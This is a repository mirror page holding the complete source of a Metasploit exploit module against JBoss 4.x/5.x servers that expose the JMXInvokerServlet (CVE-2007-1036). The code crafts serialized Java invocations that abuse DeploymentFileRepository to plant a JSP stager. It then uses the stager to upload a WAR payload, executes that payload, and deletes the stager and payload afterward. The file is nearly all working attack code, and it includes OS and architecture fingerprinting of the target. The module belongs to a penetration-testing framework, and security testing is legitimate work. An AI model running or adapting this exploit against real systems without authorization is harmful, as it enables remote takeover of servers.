Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

jboss_invoke_deploy.rb 24KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
  6. class Metasploit4 < Msf::Exploit::Remote
  7. Rank = ExcellentRanking
  8. HttpFingerprint = { :pattern => [ /JBoss/ ] }
  9. include Msf::Exploit::Remote::HttpClient
  10. include Msf::Exploit::EXE
  11. def initialize(info = {})
  12. super(update_info(info,
  13. 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',
  14. 'Description' => %q{
  15. This module can be used to execute a payload on JBoss servers that have an
  16. exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking
  17. the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed
  18. to finally upload the selected payload to the target. The DeploymentFileRepository
  19. methods are only available on Jboss 4.x and 5.x.
  20. },
  21. 'Author' => [
  22. 'Patrick Hof', # Vulnerability discovery, analysis and PoC
  23. 'Jens Liebchen', # Vulnerability discovery, analysis and PoC
  24. 'h0ng10' # Metasploit module
  25. ],
  26. 'License' => MSF_LICENSE,
  27. 'References' =>
  28. [
  29. [ 'CVE', '2007-1036' ],
  30. [ 'OSVDB', '33744' ],
  31. [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
  32. ],
  33. 'DisclosureDate' => 'Feb 20 2007',
  34. 'Privileged' => true,
  35. 'Platform' => %w{ java linux win },
  36. 'Stance' => Msf::Exploit::Stance::Aggressive,
  37. 'Targets' =>
  38. [
  39. # do target detection but java meter by default
  40. [ 'Automatic',
  41. {
  42. 'Arch' => ARCH_JAVA,
  43. 'Platform' => 'java'
  44. }
  45. ],
  46. [ 'Java Universal',
  47. {
  48. 'Arch' => ARCH_JAVA,
  49. },
  50. ],
  51. #
  52. # Platform specific targets
  53. #
  54. [ 'Windows Universal',
  55. {
  56. 'Arch' => ARCH_X86,
  57. 'Platform' => 'win'
  58. },
  59. ],
  60. [ 'Linux x86',
  61. {
  62. 'Arch' => ARCH_X86,
  63. 'Platform' => 'linux'
  64. },
  65. ],
  66. ],
  67. 'DefaultTarget' => 0))
  68. register_options(
  69. [
  70. Opt::RPORT(8080),
  71. OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
  72. OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
  73. OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),
  74. ], self.class)
  75. end
  76. def check
  77. res = send_serialized_request('version')
  78. if res.nil?
  79. vprint_error('Connection timed out')
  80. return Exploit::CheckCode::Unknown
  81. elsif res.code != 200
  82. vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
  83. return Exploit::CheckCode::Unknown
  84. end
  85. # Check if the version is supported by this exploit
  86. return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/
  87. return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/
  88. return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
  89. if res.body =~ /ServletException/ # Simple check, if we caused an exception.
  90. vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
  91. return Exploit::CheckCode::Appears
  92. end
  93. return Exploit::CheckCode::Safe
  94. end
  95. def exploit
  96. mytarget = target
  97. if target.name =~ /Automatic/
  98. mytarget = auto_target
  99. fail_with(Failure::BadConfig, 'Unable to automatically select a target') unless mytarget
  100. print_status("Automatically selected target: \"#{mytarget.name}\"")
  101. else
  102. print_status("Using manually select target: \"#{mytarget.name}\"")
  103. end
  104. # We use a already serialized stager to deploy the final payload
  105. regex_stager_app_base = rand_text_alpha(14)
  106. regex_stager_jsp_name = rand_text_alpha(14)
  107. name_parameter = rand_text_alpha(8)
  108. content_parameter = rand_text_alpha(8)
  109. stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp"
  110. replace_values = {
  111. 'regex_app_base' => regex_stager_app_base,
  112. 'regex_jsp_name' => regex_stager_jsp_name,
  113. 'jsp_code' => generate_stager(name_parameter, content_parameter)
  114. }
  115. print_status('Deploying stager')
  116. send_serialized_request('installstager', replace_values)
  117. print_status("Calling stager: #{stager_uri}")
  118. call_uri_mtimes(stager_uri, 5, 'GET')
  119. # Generate the WAR with the payload which will be uploaded through the stager
  120. app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
  121. jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
  122. war_data = payload.encoded_war({
  123. :app_name => app_base,
  124. :jsp_name => jsp_name,
  125. :arch => mytarget.arch,
  126. :platform => mytarget.platform
  127. }).to_s
  128. b64_war = Rex::Text.encode_base64(war_data)
  129. print_status("Uploading payload through stager")
  130. res = send_request_cgi({
  131. 'uri' => stager_uri,
  132. 'method' => "POST",
  133. 'vars_post' =>
  134. {
  135. name_parameter => app_base,
  136. content_parameter => b64_war
  137. }
  138. })
  139. payload_uri = "/#{app_base}/#{jsp_name}.jsp"
  140. print_status("Calling payload: " + payload_uri)
  141. res = call_uri_mtimes(payload_uri,5, 'GET')
  142. # Remove the payload through stager
  143. print_status('Removing payload through stager')
  144. delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
  145. res = send_request_cgi({'uri' => delete_payload_uri})
  146. # Remove the stager
  147. print_status('Removing stager')
  148. send_serialized_request('removestagerfile', replace_values)
  149. send_serialized_request('removestagerdirectory', replace_values)
  150. handler
  151. end
  152. def generate_stager(name_param, content_param)
  153. war_file = rand_text_alpha(4+rand(4))
  154. file_content = rand_text_alpha(4+rand(4))
  155. jboss_home = rand_text_alpha(4+rand(4))
  156. decoded_content = rand_text_alpha(4+rand(4))
  157. path = rand_text_alpha(4+rand(4))
  158. fos = rand_text_alpha(4+rand(4))
  159. name = rand_text_alpha(4+rand(4))
  160. file = rand_text_alpha(4+rand(4))
  161. stager_script = <<-EOT
  162. <%@page import="java.io.*,
  163. java.util.*,
  164. sun.misc.BASE64Decoder"
  165. %>
  166. <%
  167. String #{file_content} = "";
  168. String #{war_file} = "";
  169. String #{jboss_home} = System.getProperty("jboss.server.home.dir");
  170. if (request.getParameter("#{content_param}") != null){
  171. try {
  172. #{file_content} = request.getParameter("#{content_param}");
  173. #{war_file} = request.getParameter("#{name_param}");
  174. byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});
  175. String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war";
  176. FileOutputStream #{fos} = new FileOutputStream(#{path});
  177. #{fos}.write(#{decoded_content});
  178. #{fos}.close();
  179. }
  180. catch(Exception e) {}
  181. }
  182. else {
  183. try{
  184. String #{name} = request.getParameter("#{name_param}");
  185. String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war";
  186. new File(#{file}).delete();
  187. }
  188. catch(Exception e) {}
  189. }
  190. %>
  191. EOT
  192. end
  193. def send_serialized_request(operation , replace_params = {})
  194. data = ''
  195. case operation
  196. when 'version'
  197. data = build_get_version.encode
  198. when 'osname'
  199. data = build_get_os.encode
  200. when 'osarch'
  201. data = build_get_arch.encode
  202. when 'installstager'
  203. data = build_install_stager(
  204. war_name: replace_params['regex_app_base'],
  205. jsp_name: replace_params['regex_jsp_name'],
  206. data: replace_params['jsp_code']
  207. ).encode
  208. when 'removestagerfile'
  209. data = build_delete_stager_file(
  210. dir: "#{replace_params['regex_app_base']}.war",
  211. file: replace_params['regex_jsp_name'],
  212. extension: '.jsp'
  213. ).encode
  214. when 'removestagerdirectory'
  215. data = build_delete_stager_file(
  216. dir: './',
  217. file: replace_params['regex_app_base'],
  218. extension: '.war'
  219. ).encode
  220. else
  221. fail_with(Failure::Unknown, "#{peer} - Unexpected operation")
  222. end
  223. res = send_request_cgi({
  224. 'uri' => normalize_uri(target_uri.path),
  225. 'method' => 'POST',
  226. 'data' => data,
  227. 'headers' =>
  228. {
  229. 'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
  230. 'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'
  231. }
  232. }, 25)
  233. unless res && res.code == 200
  234. print_error("Failed: Error requesting preserialized request #{operation}")
  235. return nil
  236. end
  237. res
  238. end
  239. def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)
  240. # JBoss might need some time for the deployment. Try 5 times at most and
  241. # wait 5 seconds inbetween tries
  242. num_attempts.times do |attempt|
  243. if verb == "POST"
  244. res = send_request_cgi(
  245. {
  246. 'uri' => uri,
  247. 'method' => verb,
  248. 'data' => data
  249. }, 5)
  250. else
  251. uri += "?#{data}" unless data.nil?
  252. res = send_request_cgi(
  253. {
  254. 'uri' => uri,
  255. 'method' => verb
  256. }, 30)
  257. end
  258. msg = nil
  259. if res.nil?
  260. msg = "Execution failed on #{uri} [No Response]"
  261. elsif res.code < 200 || res.code >= 300
  262. msg = "http request failed to #{uri} [#{res.code}]"
  263. elsif res.code == 200
  264. vprint_status("Successfully called '#{uri}'")
  265. return res
  266. end
  267. if attempt < num_attempts - 1
  268. msg << ', retrying in 5 seconds...'
  269. vprint_status(msg)
  270. select(nil, nil, nil, 5)
  271. else
  272. print_error(msg)
  273. return res
  274. end
  275. end
  276. end
  277. def auto_target
  278. print_status('Attempting to automatically select a target')
  279. plat = detect_platform
  280. arch = detect_architecture
  281. return nil unless arch && plat
  282. # see if we have a match
  283. targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
  284. # no matching target found
  285. return nil
  286. end
  287. # Try to autodetect the target platform
  288. def detect_platform
  289. print_status('Attempting to automatically detect the platform')
  290. res = send_serialized_request('osname')
  291. if res.body =~ /(Linux|FreeBSD|Windows)/i
  292. os = $1
  293. if os =~ /Linux/i
  294. return 'linux'
  295. elsif os =~ /FreeBSD/i
  296. return 'linux'
  297. elsif os =~ /Windows/i
  298. return 'win'
  299. end
  300. end
  301. nil
  302. end
  303. # Try to autodetect the architecture
  304. def detect_architecture
  305. print_status('Attempting to automatically detect the architecture')
  306. res = send_serialized_request('osarch')
  307. if res.body =~ /(i386|x86)/i
  308. arch = $1
  309. if arch =~ /i386|x86/i
  310. return ARCH_X86
  311. # TODO, more
  312. end
  313. end
  314. nil
  315. end
  316. def build_get_version
  317. builder = Rex::Java::Serialization::Builder.new
  318. object_array = builder.new_array(
  319. values_type: 'java.lang.Object;',
  320. values: [
  321. builder.new_object(
  322. name: 'javax.management.ObjectName',
  323. serial: 0xf03a71beb6d15cf,
  324. flags: 3,
  325. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  326. ),
  327. Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=Server')
  328. ],
  329. name: '[Ljava.lang.Object;',
  330. serial: 0x90ce589f1073296c,
  331. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  332. )
  333. stream = Rex::Java::Serialization::Model::Stream.new
  334. stream.contents = []
  335. stream.contents << object_array
  336. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  337. stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'Version')
  338. build_invocation(stream)
  339. end
  340. def build_get_os
  341. builder = Rex::Java::Serialization::Builder.new
  342. object_array = builder.new_array(
  343. values_type: 'java.lang.Object;',
  344. values: [
  345. builder.new_object(
  346. name: 'javax.management.ObjectName',
  347. serial: 0xf03a71beb6d15cf,
  348. flags: 3,
  349. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  350. ),
  351. Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
  352. ],
  353. name: '[Ljava.lang.Object;',
  354. serial: 0x90ce589f1073296c,
  355. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  356. )
  357. stream = Rex::Java::Serialization::Model::Stream.new
  358. stream.contents = []
  359. stream.contents << object_array
  360. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  361. stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSName')
  362. build_invocation(stream)
  363. end
  364. def build_get_arch
  365. builder = Rex::Java::Serialization::Builder.new
  366. object_array = builder.new_array(
  367. values_type: 'java.lang.Object;',
  368. values: [
  369. builder.new_object(
  370. name: 'javax.management.ObjectName',
  371. serial: 0xf03a71beb6d15cf,
  372. flags: 3,
  373. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  374. ),
  375. Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.system:type=ServerInfo')
  376. ],
  377. name: '[Ljava.lang.Object;',
  378. serial: 0x90ce589f1073296c,
  379. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  380. )
  381. stream = Rex::Java::Serialization::Model::Stream.new
  382. stream.contents = []
  383. stream.contents << object_array
  384. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  385. stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'OSArch')
  386. build_invocation(stream)
  387. end
  388. def build_install_stager(opts = {})
  389. war_name = "#{opts[:war_name]}.war"
  390. jsp_name = opts[:jsp_name] || ''
  391. extension = opts[:extension] || '.jsp'
  392. data = opts[:data] || ''
  393. builder = Rex::Java::Serialization::Builder.new
  394. object_array = builder.new_array(
  395. values_type: 'java.lang.Object;',
  396. values: [
  397. builder.new_object(
  398. name: 'javax.management.ObjectName',
  399. serial: 0xf03a71beb6d15cf,
  400. flags: 3,
  401. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  402. ),
  403. Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),
  404. Rex::Java::Serialization::Model::EndBlockData.new,
  405. Rex::Java::Serialization::Model::Utf.new(nil, 'store')
  406. ],
  407. name: '[Ljava.lang.Object;',
  408. serial: 0x90ce589f1073296c,
  409. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  410. )
  411. values_array = builder.new_array(
  412. values_type: 'java.lang.Object;',
  413. values: [
  414. Rex::Java::Serialization::Model::Utf.new(nil, war_name),
  415. Rex::Java::Serialization::Model::Utf.new(nil, jsp_name),
  416. Rex::Java::Serialization::Model::Utf.new(nil, extension),
  417. Rex::Java::Serialization::Model::Utf.new(nil, data),
  418. builder.new_object(
  419. name: 'java.lang.Boolean',
  420. serial: 0xcd207280d59cfaee,
  421. annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
  422. fields: [['boolean', 'value']],
  423. data: [['boolean', 0]]
  424. )
  425. ],
  426. name: '[Ljava.lang.Object;',
  427. serial: 0x90ce589f1073296c,
  428. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  429. )
  430. types_array = builder.new_array(
  431. values_type: 'java.lang.String;',
  432. values: [
  433. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  434. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  435. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  436. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  437. Rex::Java::Serialization::Model::Utf.new(nil, 'boolean')
  438. ],
  439. name: '[Ljava.lang.String;',
  440. serial: 0xadd256e7e91d7b47,
  441. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  442. )
  443. stream = Rex::Java::Serialization::Model::Stream.new
  444. stream.contents = []
  445. stream.contents << object_array
  446. stream.contents << values_array
  447. stream.contents << types_array
  448. build_invocation_deploy(stream)
  449. end
  450. def build_delete_stager_file(opts = {})
  451. dir = opts[:dir] || ''
  452. file = opts[:file] || ''
  453. extension = opts[:extension] || '.jsp'
  454. builder = Rex::Java::Serialization::Builder.new
  455. object_array = builder.new_array(
  456. values_type: 'java.lang.Object;',
  457. values: [
  458. builder.new_object(
  459. name: 'javax.management.ObjectName',
  460. serial: 0xf03a71beb6d15cf,
  461. flags: 3,
  462. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  463. ),
  464. Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),
  465. Rex::Java::Serialization::Model::EndBlockData.new,
  466. Rex::Java::Serialization::Model::Utf.new(nil, 'remove')
  467. ],
  468. name: '[Ljava.lang.Object;',
  469. serial: 0x90ce589f1073296c,
  470. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  471. )
  472. values_array = builder.new_array(
  473. values_type: 'java.lang.Object;',
  474. values: [
  475. Rex::Java::Serialization::Model::Utf.new(nil, dir),
  476. Rex::Java::Serialization::Model::Utf.new(nil, file),
  477. Rex::Java::Serialization::Model::Utf.new(nil, extension)
  478. ],
  479. name: '[Ljava.lang.Object;',
  480. serial: 0x90ce589f1073296c,
  481. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  482. )
  483. types_array = builder.new_array(
  484. values_type: 'java.lang.String;',
  485. values: [
  486. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  487. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),
  488. Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String')
  489. ],
  490. name: '[Ljava.lang.String;',
  491. serial: 0xadd256e7e91d7b47,
  492. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  493. )
  494. stream = Rex::Java::Serialization::Model::Stream.new
  495. stream.contents = []
  496. stream.contents << object_array
  497. stream.contents << values_array
  498. stream.contents << types_array
  499. build_invocation_deploy(stream)
  500. end
  501. def build_invocation(stream_argument)
  502. stream = Rex::Java::Serialization::Model::Stream.new
  503. stream.contents = []
  504. null_stream = build_null_stream
  505. null_stream_enc = null_stream.encode
  506. null_stream_value = [null_stream_enc.length].pack('N')
  507. null_stream_value << null_stream_enc
  508. null_stream_value << "\xfb\x57\xa7\xaa"
  509. stream_argument_enc = stream_argument.encode
  510. stream_argument_value = [stream_argument_enc.length].pack('N')
  511. stream_argument_value << stream_argument_enc
  512. stream_argument_value << "\x7b\x87\xa0\xfb"
  513. stream.contents << build_marshalled_invocation
  514. stream.contents << Rex::Java::Serialization::Model::NullReference.new
  515. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x97\x51\x4d\xdd\xd4\x2a\x42\xaf")
  516. stream.contents << build_integer(647347722)
  517. stream.contents << build_marshalled_value
  518. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, stream_argument_value)
  519. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  520. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
  521. stream.contents << build_invocation_key(5)
  522. stream.contents << build_marshalled_value
  523. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
  524. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  525. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x02")
  526. stream.contents << build_invocation_key(4)
  527. stream.contents << build_invocation_type(1)
  528. stream.contents << build_invocation_key(10)
  529. stream.contents << Rex::Java::Serialization::Model::NullReference.new
  530. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  531. stream
  532. end
  533. def build_invocation_deploy(stream_argument)
  534. builder = Rex::Java::Serialization::Builder.new
  535. stream = Rex::Java::Serialization::Model::Stream.new
  536. stream.contents = []
  537. null_stream = build_null_stream
  538. null_stream_enc = null_stream.encode
  539. null_stream_value = [null_stream_enc.length].pack('N')
  540. null_stream_value << null_stream_enc
  541. null_stream_value << "\xfb\x57\xa7\xaa"
  542. stream_argument_enc = stream_argument.encode
  543. stream_argument_value = [stream_argument_enc.length].pack('N')
  544. stream_argument_value << stream_argument_enc
  545. stream_argument_value << "\x7b\x87\xa0\xfb"
  546. stream.contents << build_marshalled_invocation
  547. stream.contents << Rex::Java::Serialization::Model::NullReference.new
  548. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x78\x94\x98\x47\xc1\xd0\x53\x87")
  549. stream.contents << build_integer(647347722)
  550. stream.contents << build_marshalled_value
  551. stream.contents << Rex::Java::Serialization::Model::BlockDataLong.new(nil, stream_argument_value)
  552. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  553. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x01")
  554. stream.contents << build_invocation_key(5)
  555. stream.contents << build_marshalled_value
  556. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)
  557. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  558. stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x03")
  559. stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'JMX_OBJECT_NAME')
  560. stream.contents << builder.new_object(
  561. name: 'javax.management.ObjectName',
  562. serial: 0xf03a71beb6d15cf,
  563. flags: 3,
  564. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  565. )
  566. stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository')
  567. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  568. stream.contents << build_invocation_key(4)
  569. stream.contents << build_invocation_type(1)
  570. stream.contents << build_invocation_key(10)
  571. stream.contents << Rex::Java::Serialization::Model::NullReference.new
  572. stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  573. stream
  574. end
  575. def build_marshalled_invocation
  576. builder = Rex::Java::Serialization::Builder.new
  577. builder.new_object(
  578. name: 'org.jboss.invocation.MarshalledInvocation',
  579. serial: 0xf6069527413ea4be,
  580. flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
  581. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  582. )
  583. end
  584. def build_marshalled_value
  585. builder = Rex::Java::Serialization::Builder.new
  586. builder.new_object(
  587. name: 'org.jboss.invocation.MarshalledValue',
  588. serial: 0xeacce0d1f44ad099,
  589. flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,
  590. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  591. )
  592. end
  593. def build_invocation_key(ordinal)
  594. builder = Rex::Java::Serialization::Builder.new
  595. builder.new_object(
  596. name: 'org.jboss.invocation.InvocationKey',
  597. serial: 0xb8fb7284d79385f9,
  598. annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
  599. fields: [
  600. ['int', 'ordinal']
  601. ],
  602. data:[
  603. ['int', ordinal]
  604. ]
  605. )
  606. end
  607. def build_invocation_type(ordinal)
  608. builder = Rex::Java::Serialization::Builder.new
  609. builder.new_object(
  610. name: 'org.jboss.invocation.InvocationType',
  611. serial: 0x59a73a1ca52b7cbf,
  612. annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
  613. fields: [
  614. ['int', 'ordinal']
  615. ],
  616. data:[
  617. ['int', ordinal]
  618. ]
  619. )
  620. end
  621. def build_integer(value)
  622. builder = Rex::Java::Serialization::Builder.new
  623. builder.new_object(
  624. name: 'java.lang.Integer',
  625. serial: 0x12e2a0a4f7818738,
  626. annotations: [Rex::Java::Serialization::Model::EndBlockData.new],
  627. super_class: builder.new_class(
  628. name: 'java.lang.Number',
  629. serial: 0x86ac951d0b94e08b,
  630. annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  631. ),
  632. fields: [
  633. ['int', 'value']
  634. ],
  635. data:[
  636. ['int', value]
  637. ]
  638. )
  639. end
  640. def build_null_stream
  641. stream = Rex::Java::Serialization::Model::Stream.new
  642. stream.contents = [Rex::Java::Serialization::Model::NullReference.new]
  643. stream
  644. end
  645. end